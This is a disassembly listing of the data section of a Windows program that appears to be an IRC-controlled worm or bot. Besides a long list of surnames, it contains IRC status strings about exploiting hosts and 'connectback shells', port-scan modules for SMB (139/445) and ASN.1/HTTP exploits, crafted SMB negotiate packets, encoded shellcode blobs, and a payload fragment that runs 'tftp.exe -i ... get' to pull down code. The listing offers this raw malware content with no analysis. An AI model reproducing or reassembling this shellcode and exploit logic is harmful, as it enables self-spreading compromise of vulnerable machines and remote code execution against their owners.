aThibault db 'Thibault',0 ; DATA XREF: .data:00445404�o
align 4
aThisted db 'Thisted',0 ; DATA XREF: .data:00445408�o
aThomsen db 'Thomsen',0 ; DATA XREF: .data:0044540C�o
aThroop db 'Throop',0 ; DATA XREF: .data:00445410�o
align 4
aTierney db 'Tierney',0 ; DATA XREF: .data:00445414�o
aTill db 'Till',0 ; DATA XREF: .data:00445418�o
align 4
aTimmons db 'Timmons',0 ; DATA XREF: .data:0044541C�o
aTofallis db 'Tofallis',0 ; DATA XREF: .data:00445420�o
align 10h
aTollestrup db 'Tollestrup',0 ; DATA XREF: .data:00445424�o
align 4
aTolls db 'Tolls',0 ; DATA XREF: .data:00445428�o
align 4
aTolman db 'Tolman',0 ; DATA XREF: .data:0044542C�o
align 4
aTomford db 'Tomford',0 ; DATA XREF: .data:00445430�o
aToomer db 'Toomer',0 ; DATA XREF: .data:00445434�o
align 4
aTopulos db 'Topulos',0 ; DATA XREF: .data:00445438�o
aTorresi db 'Torresi',0 ; DATA XREF: .data:0044543C�o
aTorske db 'Torske',0 ; DATA XREF: .data:00445440�o
align 4
aTowler db 'Towler',0 ; DATA XREF: .data:00445444�o
align 4
aToye db 'Toye',0 ; DATA XREF: .data:00445448�o
align 4
aTraebert db 'Traebert',0 ; DATA XREF: .data:0044544C�o
align 10h
aTrenga db 'Trenga',0 ; DATA XREF: .data:00445450�o
align 4
aTrewin db 'Trewin',0 ; DATA XREF: .data:00445454�o
align 10h
aTringali db 'Tringali',0 ; DATA XREF: .data:00445458�o
align 4
aTroiani db 'Troiani',0 ; DATA XREF: .data:0044545C�o
aTroy db 'Troy',0 ; DATA XREF: .data:00445460�o
align 4
aTruss db 'Truss',0 ; DATA XREF: .data:00445464�o
align 4
aTsiatis db 'Tsiatis',0 ; DATA XREF: .data:00445468�o
aTsomides db 'Tsomides',0 ; DATA XREF: .data:0044546C�o
align 4
aTsukurov db 'Tsukurov',0 ; DATA XREF: .data:00445470�o
align 4
aTuck db 'Tuck',0 ; DATA XREF: .data:00445474�o
align 4
aTudge db 'Tudge',0 ; DATA XREF: .data:00445478�o
align 4
aTukan db 'Tukan',0 ; DATA XREF: .data:0044547C�o
align 4
aTurano db 'Turano',0 ; DATA XREF: .data:00445480�o
align 4
aTurek db 'Turek',0 ; DATA XREF: .data:00445484�o
align 4
aTuttle db 'Tuttle',0 ; DATA XREF: .data:00445488�o
align 4
aTwells db 'Twells',0 ; DATA XREF: .data:0044548C�o
align 4
aTzamarias db 'Tzamarias',0 ; DATA XREF: .data:00445490�o
align 4
aUllman db 'Ullman',0 ; DATA XREF: .data:00445494�o
align 10h
aUntermeyer db 'Untermeyer',0 ; DATA XREF: .data:00445498�o
align 4
aUpsdell db 'Upsdell',0 ; DATA XREF: .data:0044549C�o
aUrban db 'Urban',0 ; DATA XREF: .data:004454A0�o
align 4
aUrdangBrown db 'Urdang-Brown',0 ; DATA XREF: .data:004454A4�o
align 4
aUsdan db 'Usdan',0 ; DATA XREF: .data:004454A8�o
align 4
aUzuner db 'Uzuner',0 ; DATA XREF: .data:004454AC�o
align 4
aVacca db 'Vacca',0 ; DATA XREF: .data:004454B0�o
align 4
aWaite db 'Waite',0 ; DATA XREF: .data:004454B4�o
align 4
aValberg db 'Valberg',0 ; DATA XREF: .data:004454B8�o
aValencia db 'Valencia',0 ; DATA XREF: .data:004454BC�o
align 10h
aWales db 'Wales',0 ; DATA XREF: .data:004454C0�o
align 4
aWallenberg db 'Wallenberg',0 ; DATA XREF: .data:004454C4�o
align 4
aWalter db 'Walter',0 ; DATA XREF: .data:004454C8�o
align 4
aVanallen db 'vanAllen',0 ; DATA XREF: .data:004454CC�o
align 4
aVanzwet db 'VanZwet',0 ; DATA XREF: .data:004454D0�o
aVandenberg db 'Vandenberg',0 ; DATA XREF: .data:004454D4�o
align 4
aVanheeckeren db 'Vanheeckeren',0 ; DATA XREF: .data:004454D8�o
align 4
aWarshafsky db 'Warshafsky',0 ; DATA XREF: .data:004454DC�o
align 4
aWasowska db 'Wasowska',0 ; DATA XREF: .data:004454E0�o
align 4
aVasquez db 'Vasquez',0 ; DATA XREF: .data:004454E4�o
aWaugh db 'Waugh',0 ; DATA XREF: .data:004454E8�o
align 4
aWeighart db 'Weighart',0 ; DATA XREF: .data:004454EC�o
align 10h
aWeingarten db 'Weingarten',0 ; DATA XREF: .data:004454F0�o
align 4
aWeinhaus db 'Weinhaus',0 ; DATA XREF: .data:004454F4�o
align 4
aWeissbourd db 'Weissbourd',0 ; DATA XREF: .data:004454F8�o
align 4
aWeissman db 'Weissman',0 ; DATA XREF: .data:004454FC�o
align 10h
aVelasquez db 'Velasquez',0 ; DATA XREF: .data:00445500�o
align 4
aWelles db 'Welles',0 ; DATA XREF: .data:00445504�o
align 4
aWelsh db 'Welsh',0 ; DATA XREF: .data:00445508�o
align 4
aWengret db 'Wengret',0 ; DATA XREF: .data:0044550C�o
aVenne db 'Venne',0 ; DATA XREF: .data:00445510�o
align 4
aVerghese db 'Verghese',0 ; DATA XREF: .data:00445514�o
align 4
aWescott db 'Wescott',0 ; DATA XREF: .data:00445518�o
aWetzel db 'Wetzel',0 ; DATA XREF: .data:0044551C�o
align 4
aWhately db 'Whately',0 ; DATA XREF: .data:00445520�o
aWhilton db 'Whilton',0 ; DATA XREF: .data:00445524�o
aWhite db 'White',0 ; DATA XREF: .data:00445528�o
align 10h
aWhitla db 'Whitla',0 ; DATA XREF: .data:0044552C�o
align 4
aWhittaker db 'Whittaker',0 ; DATA XREF: .data:00445530�o
align 4
aViana db 'Viana',0 ; DATA XREF: .data:00445534�o
align 4
aViano db 'Viano',0 ; DATA XREF: .data:00445538�o
align 4
aWiedersheim db 'Wiedersheim',0 ; DATA XREF: .data:0044553C�o
aWiener db 'Wiener',0 ; DATA XREF: .data:00445540�o
align 4
aViens db 'Viens',0 ; DATA XREF: .data:00445544�o
align 10h
aVignola db 'Vignola',0 ; DATA XREF: .data:00445548�o
aWilder db 'Wilder',0 ; DATA XREF: .data:0044554C�o
align 10h
aWilhelm db 'Wilhelm',0 ; DATA XREF: .data:00445550�o
aWilk db 'Wilk',0 ; DATA XREF: .data:00445554�o
align 10h
aWilkin db 'Wilkin',0 ; DATA XREF: .data:00445558�o
align 4
aWilkinson db 'Wilkinson',0 ; DATA XREF: .data:0044555C�o
align 4
aVillarreal db 'Villarreal',0 ; DATA XREF: .data:00445560�o
align 10h
aWillstatter db 'Willstatter',0 ; DATA XREF: .data:00445564�o
aWilson db 'Wilson',0 ; DATA XREF: .data:00445568�o
align 4
aVitali db 'Vitali',0 ; DATA XREF: .data:0044556C�o
align 4
aViviani db 'Viviani',0 ; DATA XREF: .data:00445570�o
aVoigt db 'Voigt',0 ; DATA XREF: .data:00445574�o
align 4
aWolk db 'Wolk',0 ; DATA XREF: .data:00445578�o
align 4
aVonhoffman db 'VonHoffman',0 ; DATA XREF: .data:0044557C�o
align 10h
aWoo db 'Woo',0 ; DATA XREF: .data:00445580�o
aWooden db 'Wooden',0 ; DATA XREF: .data:00445584�o
align 4
aWoods db 'Woods',0 ; DATA XREF: .data:00445588�o
align 4
aWoodsPowell db 'Woods-Powell',0 ; DATA XREF: .data:0044558C�o
align 4
aVorhaus db 'Vorhaus',0 ; DATA XREF: .data:00445590�o
aVotey db 'Votey',0 ; DATA XREF: .data:00445594�o
align 4
aYacono db 'Yacono',0 ; DATA XREF: .data:00445598�o
align 4
aYamane db 'Yamane',0 ; DATA XREF: .data:0044559C�o
align 4
aYankee db 'Yankee',0 ; DATA XREF: .data:004455A0�o
align 4
aYarchuk db 'Yarchuk',0 ; DATA XREF: .data:004455A4�o
aYates db 'Yates',0 ; DATA XREF: .data:004455A8�o
align 4
aYbarra db 'Ybarra',0 ; DATA XREF: .data:004455AC�o
align 4
aYedidia db 'Yedidia',0 ; DATA XREF: .data:004455B0�o
aYesson db 'Yesson',0 ; DATA XREF: .data:004455B4�o
align 4
aYetiv db 'Yetiv',0 ; DATA XREF: .data:004455B8�o
align 4
aYoffe db 'Yoffe',0 ; DATA XREF: .data:004455BC�o
align 4
aYoo db 'Yoo',0 ; DATA XREF: .data:004455C0�o
aYoukSee db 'Youk-See',0 ; DATA XREF: .data:004455C4�o
align 4
aYu db 'Yu',0 ; DATA XREF: .data:004455C8�o
align 4
aZachary db 'Zachary',0 ; DATA XREF: .data:004455CC�o
aZahedi db 'Zahedi',0 ; DATA XREF: .data:004455D0�o
align 4
aZangwill db 'Zangwill',0 ; DATA XREF: .data:004455D4�o
align 4
aZegans db 'Zegans',0 ; DATA XREF: .data:004455D8�o
align 4
aZerbini db 'Zerbini',0 ; DATA XREF: .data:004455DC�o
aZoldak db 'Zoldak',0 ; DATA XREF: .data:004455E0�o
align 4
aZucconi db 'Zucconi',0 ; DATA XREF: .data:004455E4�o
aZurn db 'Zurn',0 ; DATA XREF: .data:004455E8�o
align 4
aZwiers db 'Zwiers',0 ; DATA XREF: .data:004455EC�o
align 4
aZytowski db 'Zytowski',0 ; DATA XREF: .data:004455F0�o
align 10h
; char aS_37[]
aS_37 db '%s',0 ; DATA XREF: sub_40B06A+28�o
align 4
; char aSI_3[]
aSI_3 db '%s%i',0 ; DATA XREF: sub_40B06A+4F�o
align 4
; char aS_38[]
aS_38 db '%s',0 ; DATA XREF: sub_40B0D7+19�o
align 10h
; char aSI_4[]
aSI_4 db '%s%i',0 ; DATA XREF: sub_40B0D7+40�o
align 4
; char aPc[]
aPc db 'PC',0 ; DATA XREF: sub_40B182+6�o
align 4
aPc_0 db 'PC',0 ; DATA XREF: sub_40B182+30�o
align 10h
aPc_1 db 'PC',0 ; DATA XREF: sub_40B182+5C�o
align 4
; char aSI_0[]
aSI_0 db '%s%i',0 ; DATA XREF: sub_40B182+87�o
align 4
; char aS_22[]
aS_22 db '%s|',0 ; DATA XREF: sub_40B228+2F�o
; char aSI_1[]
aSI_1 db '%s%i',0 ; DATA XREF: sub_40B228+56�o
align 4
a95 db '95',0 ; DATA XREF: sub_40B29D+4F�o
align 4
aNt db 'NT',0 ; DATA XREF: sub_40B29D+5D�o
align 10h
a98 db '98',0 ; DATA XREF: sub_40B29D+6D�o
align 4
aMe_0 db 'ME',0 ; DATA XREF: sub_40B29D+7D�o
align 4
a2k db '2K',0 ; DATA XREF: sub_40B29D+96�o
align 4
aXp db 'XP',0 ; DATA XREF: sub_40B29D+A6�o
align 10h
a2k3 db '2K3',0 ; DATA XREF: sub_40B29D+B4�o
a??? db '???',0 ; DATA XREF: sub_40B29D:loc_40B358�o
; char aS_23[]
aS_23 db '[%s]|',0 ; DATA XREF: sub_40B29D+C4�o
align 10h
; char aSI_2[]
aSI_2 db '%s%i',0 ; DATA XREF: sub_40B29D+EB�o
align 4
aMirc_0 db 'mIRC',0 ; DATA XREF: sub_40B3A7+1F�o
align 10h
aM_0 db '[M]',0 ; DATA XREF: sub_40B3A7+2C�o
; char aDS[]
aDS db '[%d]%s',0 ; DATA XREF: sub_40B3A7+3A�o
align 4
aMirc_1 db 'mIRC',0 ; DATA XREF: sub_40B3A7:loc_40B3F6�o
align 4
; char aM_1[]
aM_1 db '[M]',0 ; DATA XREF: sub_40B3A7+5C�o
dword_4480A8 dd 5EB02EBh, 0FFFFF9E8h, 0C9315BFFh ; DATA XREF: sub_40B64F+C4�o
db 66h, 0B9h
word_4480B6 dw 0FFFFh ; DATA XREF: sub_40B64F+CC�w
db 80h, 73h, 0Eh
byte_4480BB db 0FFh ; DATA XREF: sub_40B64F+D3�w
dd 0F9E243h
dword_4480C0 dd 5EB02EBh, 0FFFFF9E8h, 0C9315BFFh ; DATA XREF: sub_40B64F+A2�o
db 0B1h
byte_4480CD db 0FFh ; DATA XREF: sub_40B64F+AA�w
dw 7380h
db 0Ch
byte_4480D1 db 0FFh ; DATA XREF: sub_40B64F+B0�w
dw 0E243h
dd 0F9h
dword_4480D8 dd 364C033h, 0C783040h, 8B0C408Bh, 8BAD1C70h, 9EB0840h
; DATA XREF: sub_40B4D8+57�o
dd 8D34408Bh, 408B7C40h, 3D08B3Ch, 0CA8B3C40h, 8B784803h
dd 0DA8B2041h, 331C5903h, 57F633FFh, 3CA8B57h, 7981100Ch
dd 7373650Ah, 8B027541h, 3798133h, 72685474h, 3B8B0275h
dd 8304C083h, 0F68504C3h, 0FF85DB74h, 0F203D774h, 0E857FA03h
dword_44813C dd 12h ; DATA XREF: sub_40B4D8+3D�w
dd 70746674h, 6578652Eh, 20692D20h
aGet db ' get ',0 ; DATA XREF: sub_40B4D8+79�o
; sub_40B4D8+9B�o
aJ_0 db 'j',0
db 0E8h
dword_448155 dd 17h ; DATA XREF: sub_40B4D8+4D�w
db 75h, 1, 0C3h
db 0E8h
dword_44815D dd 1 ; DATA XREF: sub_40B4D8+45�w
byte_448161 db 0, 6Ah, 0 ; DATA XREF: sub_40B4D8+C2�o
dd 7E8h
db 0, 0Fh, 84h
dword_44816B dd 0FFFFFFEDh ; DATA XREF: sub_40B4D8+5D�w
db 0C3h
dd 505D5B58h, 3354EC83h, 8DFC8BC0h, 0D78B4048h, 44B0AAF3h
dd 515257ABh, 6A286A51h, 55515101h, 83D6FF53h, 0C08554C4h
dd 0C3h
dword_44819C dd 234032Dh, 65726874h, 6C206461h, 2747369h, 202D03h
; DATA XREF: sub_40B813+10�o
; char aD_S_0[]
aD_S_0 db '%d. %s',0 ; DATA XREF: sub_40B813+46�o
align 4
; char aSSStopped_DThr[]
aSSStopped_DThr db '%s %s stopped. (%d thread(s) stopped.)',0 ; DATA XREF: sub_40B9E4+35�o
align 10h
; char aSNoSThreadFoun[]
aSNoSThreadFoun db '%s No %s thread found.',0 ; DATA XREF: sub_40B9E4+51�o
align 4
aSym db 'sym',0 ; DATA XREF: sub_40C951+169�o
dd 0
db 2 dup(0)
aSymantec db 'Symantec',0 ; DATA XREF: sub_40BE3A+30�o
align 4
dd 5 dup(0)
dword_448220 dd 0B97h ; DATA XREF: sub_401CC7+1D91�r
; sub_401CC7+1DBA�o ...
off_448224 dd offset sub_40EB28 ; DATA XREF: sub_40C951+1EA�r
dword_448228 dd 0 ; DATA XREF: sub_40BCAA+2E�o
; sub_40DB0C+19E�w ...
dword_44822C dd 1 ; DATA XREF: sub_40C12D+1F�r
dword_448230 dd 1 ; DATA XREF: sub_40C12D+3B3�r
dword_448234 dd 0 ; DATA XREF: sub_40C12D+292�r
dd 636E76h, 0
dd 6E760000h, 63h, 6 dup(0)
dd 170Ch
dd offset sub_40EC5E
dd 0
dd 2 dup(1), 0
aNet139 db 'net139',0
align 10h
dd 654E0000h, 69706174h, 393331h, 5 dup(0)
dd 8Bh
dd offset sub_40E9BD
dd 0
dd 2 dup(1), 0
aNet445 db 'net445',0
align 10h
dd 654E0000h, 69706174h, 353434h, 5 dup(0)
dd 1BDh
dd offset sub_40E9BD
dd 0
dd 2 dup(1), 0
aAsn80 db 'asn80',0
align 10h
dd 53410000h, 2D312E4Eh, 50545448h, 5 dup(0)
dd 50h
dd offset sub_40DB0C
dd 0
dd 2 dup(1), 0
aAsn445 db 'asn445',0
align 10h
dd 53410000h, 2D312E4Eh, 424D53h, 5 dup(0)
dd 1BDh
dd offset sub_40DB0C
dd 0
dd 2 dup(1), 0
aAsn139 db 'asn139',0
align 10h
dd 53410000h, 2D312E4Eh, 20424D53h, 544Eh, 4 dup(0)
dd 8Bh
dd offset sub_40DB0C
dd 0
dd 2 dup(1), 2 dup(0)
dd 10100h, 0Eh dup(0)
dd 6D7973h, 0
db 2 dup(0)
byte_448402 db 1 ; DATA XREF: sub_401CC7:loc_4039D1�r
; sub_401CC7+1D14�o
db 76h
dd 636Eh, 0
dd 656E0100h, 39333174h, 0
dd 74656E01h, 353434h, 1000000h, 346E7361h, 3534h, 10000h
dd 3 dup(0)
dd 4A5A10EBh, 0B966C933h, 34800166h, 0FAE2990Ah, 0EBE805EBh
dd 70FFFFFFh, 99999899h, 699521C3h, 9912E664h, 3485E912h
dd 1291D912h, 0A5EA1241h, 0EF126A9Ah, 126A9AE1h, 629AB9E7h
dd 0AA8DD712h, 0C8CECF74h, 629AA612h, 97F36B12h, 0ED3F6AC0h
dd 1AC6C091h, 7BDC9D5Eh, 0C7C6C070h, 0DF125412h, 485A9ABDh
dd 0AA589A78h, 9112FF50h, 9A85DF12h, 9B78585Ah, 9912589Ah
dd 63125A9Ah, 5F1A6E12h, 0F3491297h, 0E571C09Ah, 1A999999h
dd 0CFCB945Fh, 0C365CE66h, 9DF34112h, 99F071C0h, 0C9C99999h
dd 98F3C9C9h, 0CE669BF3h, 5E411269h, 9E999B9Eh, 1059AA24h
dd 89F39DDEh, 0CE66CACEh, 0CA98F36Dh, 0C961CE66h, 0CE66CAC9h
dd 0DD751A65h, 42AA6D12h, 10C089F3h, 627B1785h, 10A1DF10h
dd 0DF10A5DFh, 0B5DF5ED9h, 99999898h, 0C989DE14h, 0CACACACFh
dd 0CACA98F3h, 0FAA5DE5Eh, 1499FDF4h, 0CAC9A5DEh, 0C97DCE66h
dd 0AA71CE66h, 591C3559h, 0CBC860ECh, 4B66CACFh, 7B32C0C3h
dd 5A59AA77h, 66676271h, 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h
dd 99EAEAFCh, 0F8FCEBDAh, 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh
dd 0C9EDF0E1h, 0FCFAF6EBh, 0D599EAEAh, 0D5FDF8F6h, 0F8EBFBF0h
dd 99D8E0EBh, 0C6ABEAEEh, 0CE99ABAAh, 0F6CAD8CAh, 0EDFCF2FAh
dd 0F0FB99D8h, 0F599FDF7h, 0FCEDEAF0h, 0FAF899F7h, 0EDE9FCFAh
dd 99h
; char asc_4485BC[]
asc_4485BC db '-' ; DATA XREF: sub_40BCAA+11�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aExploitStatist db 'Exploit Statistics:',0
; char asc_4485DC[]
asc_4485DC db ' ' ; DATA XREF: sub_40BCAA+46�o
db 3, 37h, 25h
dd 203A0373h, 2C6425h
; char aTotalDInS_[]
aTotalDInS_ db ' Total: %d in %s.',0 ; DATA XREF: sub_40BCAA+86�o
align 4
; char asc_4485FC[]
asc_4485FC db '-' ; DATA XREF: sub_40BD79+38�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
db 54h ; T
db 72h, 61h, 6Eh
db 73h ; s
db 66h, 65h, 72h
db 20h
db 53h, 74h, 61h
db 74h ; t
db 69h, 73h, 74h
db 69h ; i
db 63h, 73h, 3Ah
db 20h
db 2, 54h, 46h
db 54h ; T
db 50h, 2, 3Ah
db 20h
db 25h, 64h, 2Ch
db 20h
db 2, 46h, 54h
db 50h ; P
db 2, 3Ah, 20h
aDTotalDInS_ db '%d, Total %d in %s.',0
; char asc_448644[]
asc_448644 db '-' ; DATA XREF: sub_40BDE5+22�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aDConnectbackSh db '%d connectback shells in %s.',0
align 10h
; char asc_448670[]
asc_448670 db '-' ; DATA XREF: sub_40BE3A+14�o
db 3, 34h, 2
dd 6E616373h, 202D0302h, 6C707845h, 2074696Fh, 7473694Ch
dd 3Ah
; char asc_44868C[]
asc_44868C db ' ' ; DATA XREF: sub_40BE3A+40�o
db 3, 37h, 25h
dd 28200373h, 73253403h, 2C2903h
; char aScanTimeS_[]
aScanTimeS_ db ' Scan Time: %s.',0 ; DATA XREF: sub_40BE3A+7F�o
; char asc_4486AC[]
asc_4486AC db '-' ; DATA XREF: sub_40BF01+80�o
db 3, 34h, 2
db 65h ; e
db 78h, 70h, 6Ch
db 6Fh ; o
db 69h, 74h, 2
db 3
db 2Dh, 20h, 74h
db 72h ; r
db 79h, 69h, 6Eh
db 67h ; g
db 20h, 2, 25h
db 73h ; s
db 2, 20h, 6Fh
aNSPortD___ db 'n %s (port %d)...',0
align 4
; char asc_4486DC[]
asc_4486DC db '-' ; DATA XREF: sub_40BF01+172�o
db 3, 34h, 2
db 65h ; e
db 78h, 70h, 6Ch
db 6Fh ; o
db 69h, 74h, 2
db 3
aFinishedExploi db '- finished exploiting %s (%d attempts)',0
; char asc_448710[]
asc_448710 db '-' ; DATA XREF: sub_40C0B6+2C�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aCurrentIpS_ db 'Current IP: %s.',0
; char asc_44872C[]
asc_44872C db '-' ; DATA XREF: sub_40C0B6+42�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aScanNotActive_ db 'Scan not active.',0
align 4
; char asc_44874C[]
asc_44874C db '-' ; DATA XREF: sub_40C12D+DA�o
db 3, 34h, 2
db 74h ; t
db 66h, 74h, 70h
db 64h ; d
db 2, 3, 2Dh
aServerStarte_2 db ' Server started on Port: %d, File: %s.',0
align 10h
; char asc_448780[]
asc_448780 db '-' ; DATA XREF: sub_40C12D+148�o
db 3, 34h, 2
db 74h ; t
db 66h, 74h, 70h
db 64h ; d
db 2, 3, 2Dh
aFailedToSta_35 db ' Failed to start server, error: <%d>.',0
align 4
; char asc_4487B4[]
asc_4487B4 db '-' ; DATA XREF: sub_40C12D+1FE�o
db 3, 34h, 2
db 66h ; f
db 74h, 70h, 64h
db 2
db 3, 2Dh, 20h
aServerStarte_3 db 'Server started on Port: %d, File: %s.',0
align 4
; char asc_4487E8[]
asc_4487E8 db '-' ; DATA XREF: sub_40C12D+26C�o
db 3, 34h, 2
db 66h ; f
db 74h, 70h, 64h
db 2
db 3, 2Dh, 20h
aFailedToSta_36 db 'Failed to start server, error: <%d>.',0
align 4
; char asc_44881C[]
asc_44881C db '-' ; DATA XREF: sub_40C12D+321�o
db 3, 34h, 2
db 63h ; c
db 6Fh, 2 dup(6Eh)
db 65h ; e
db 63h, 74h, 62h
db 61h ; a
db 63h, 6Bh, 2
db 3
aServerStarte_4 db '- Server started on Port: %d.',0
align 4
; char asc_44884C[]
asc_44884C db '-' ; DATA XREF: sub_40C12D+38F�o
db 3, 34h, 2
db 63h ; c
db 6Fh, 2 dup(6Eh)
db 65h ; e
db 63h, 74h, 62h
db 61h ; a
db 63h, 6Bh, 2
db 3
aFailedToSta_37 db '- Failed to start server, error: <%d>.',0
; char asc_448884[]
asc_448884 db '-' ; DATA XREF: sub_40C12D+449�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aServerListen_1 db ' Server listening on IP: %s:%d, Directory: %s\.',0
; char asc_4488C0[]
asc_4488C0 db '-' ; DATA XREF: sub_40C12D+4B7�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aFailedToSta_38 db ' Failed to start server, error: <%d>.',0
align 4
; char aD_D_D_D_0[]
aD_D_D_D_0 db '%d.%d.%d.%d',0 ; DATA XREF: sub_40C64B+38�o
aSocketOpenFail db 'socket open failed',0 ; DATA XREF: .text:0040C879�o
align 4
aSendtoSocketFa db 'sendto() socket failed. sent = %d <%d>.',0 ; DATA XREF: .text:0040C8B0�o
aRecvfromSocket db 'recvfrom() socket failed',0 ; DATA XREF: .text:0040C90A�o
align 4
aSocketOpen_ db 'Socket open.',0 ; DATA XREF: .text:0040C92F�o
align 4
aSocketClosed_ db 'Socket closed.',0 ; DATA XREF: .text:loc_40C93F�o
align 4
; char asc_448978[]
asc_448978 db '-' ; DATA XREF: sub_40C951+93�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aIpSDScanThread db 'IP: %s:%d, Scan thread: %d, Sub-thread: %d.',0
; char asc_4489B0[]
asc_4489B0 db '-' ; DATA XREF: sub_40C951+EE�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aIpSPortDIsOpen db 'IP: %s, Port %d is open.',0
align 4
; char asc_4489D8[]
asc_4489D8 db '-' ; DATA XREF: sub_40CB69+87�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedToInitia db 'Failed to initialize critical section.',0
align 4
; char asc_448A0C[]
asc_448A0C db '-' ; DATA XREF: sub_40CB69+103�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aSDScanThreadDS db '%s:%d, Scan thread: %d, Sub-thread: %d.',0
; char asc_448A40[]
asc_448A40 db '-' ; DATA XREF: sub_40CB69+173�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedToStartW db 'Failed to start worker thread, error: <%d>.',0
; char asc_448A78[]
asc_448A78 db '-' ; DATA XREF: sub_40CB69+1CE�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFinishedAtSDAf db 'Finished at %s:%d after %d minute(s) of scanning.',0
align 4
; char asc_448AB8[]
asc_448AB8 db '-' ; DATA XREF: sub_40CDC8+92�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aIpSPortDIsOp_0 db 'IP: %s Port: %d is open.',0
align 10h
; char asc_448AE0[]
asc_448AE0 db '-' ; DATA XREF: sub_40CE95+41�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aScanningIpSPor db 'Scanning IP: %s, Port: %d.',0
align 4
; char asc_448B08[]
asc_448B08 db '-' ; DATA XREF: sub_40CF86+41�o
db 3, 34h, 2
db 70h ; p
db 6Fh, 72h, 74h
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aScanningIpSP_0 db 'Scanning IP: %s, Port: %d.',0
align 4
; char asc_448B34[]
asc_448B34 db '-' ; DATA XREF: sub_40CF86+D1�o
db 3, 34h, 2
db 70h ; p
db 6Fh, 72h, 74h
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFinishedScanni db 'Finished scanning IP: %s.',0
align 10h
aRbrbrbrb db 'BBBB',0 ; DATA XREF: sub_40D335+B2�o
align 4
dword_448B6C dd 10FF8h, 0 ; DATA XREF: sub_40D335+6A�o
dword_448B74 dd 10FF8h ; DATA XREF: sub_40D335+79�o
dword_448B78 dd 7FFDF020h, 0 ; DATA XREF: sub_40D335+162�o
dword_448B80 dd 424D53FFh, 72h, 0C8531800h, 3 dup(0) ; DATA XREF: sub_40D75F+7B�o
dd 13370000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
aLanman1_0 db 'LANMAN1.0',0
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
aLm1_2x002 db 'LM1.2X002',0
dw 4C02h
aAnman2_1 db 'ANMAN2.1',0
db 2, 4Eh, 54h
aLm0_12 db ' LM 0.12',0
align 4
dword_448C08 dd 424D53FFh, 73h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_40D75F+34�o
dd 13370000h, 0
dd 0FF0Ch, 0A110400h, 2 dup(0)
dword_448C38 dd 0 ; DATA XREF: sub_40D75F+44�o
dd 800000D4h, 0
unk_448C44 db 81h ; ; DATA XREF: sub_40D839+A�o
db 2 dup(0), 44h
aCkfdenecfdeffc db ' CKFDENECFDEFFCFGEFFCCACACACACACA',0
aCacacacacacaca db ' CACACACACACACACACACACACACACACAAA',0
align 10h
byte_448C90 db 41h ; DATA XREF: sub_40D8D7+FF�r
aBcdefghijklmno db 'BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/',0
align 4
aSvwfbA db 'SVWf',0 ; DATA XREF: sub_40DB0C+82�o
aIcsa db '',0
db 2 dup(0), 0FFh
dd 12096836h, 0F7E863D6h, 89000000h, 0A2E80846h, 0FF000000h
dd 6B680476h, 0E8CA2BD0h, 0E2h, 0E80C4689h, 3Fh, 680476FFh
dd 4C0297FAh, 0CDE8h, 68DB3100h, 410h, 89D0FF53h, 768B56C3h
dd 0B9C78910h, 410h, 315EA4F3h, 505050C0h, 0FF505053h
dd 468B0C56h, 0C4816608h, 5E5F0080h, 60E0FF5Bh, 23E8h
dd 24448B00h, 7C588D0Ch, 53C4383h, 284381h, 81000010h
dd 0F0002863h, 48BFFFFh, 14C48324h, 0C3C03150h, 0FF64D231h
dd 22896432h, 90B8DB31h, 31429042h, 8902B1C9h, 74AFF3DFh
dd 0F3EB4303h, 64107E89h, 6158028Fh, 20BF60C3h, 8B7FFDF0h
dd 8468B1Fh, 7F8B0789h, 78C781F8h, 89000001h, 741939F9h
dd 0EB098B04h, 39FA89F8h, 574045Ah, 0EB04528Bh, 891189F6h
dd 43C6044Ah, 0C36101FDh, 0FDF00CA1h, 1C408B7Fh, 8908588Bh
dd 8B008B1Eh, 46890840h, 8B60C304h, 8B28246Ch, 548B3C45h
dd 0EA017805h, 8B184A8Bh, 0EB01205Ah, 8B4938E3h, 0EE018B34h
dd 0C031FF31h, 0E038ACFCh, 0CFC10774h, 0EBC7010Dh, 247C3BF4h
dd 8BE17524h, 0EB01245Ah, 4B0C8B66h, 11C5A8Bh, 8B048BEBh
dd 4489E801h, 0C2611C24h, 0FEEB0008h, 0
dword_448E3C dd 0F254C481h, 0E8FCFFFFh, 46h, 8B3C458Bh, 178057Ch, 184F8BEFh
; DATA XREF: sub_40DB0C+30�o
dd 1205F8Bh, 492EE3EBh, 18B348Bh, 99C031EEh, 74C084ACh
dd 0DCAC107h, 0F4EBC201h, 424543Bh, 5F8BE375h, 66EB0124h
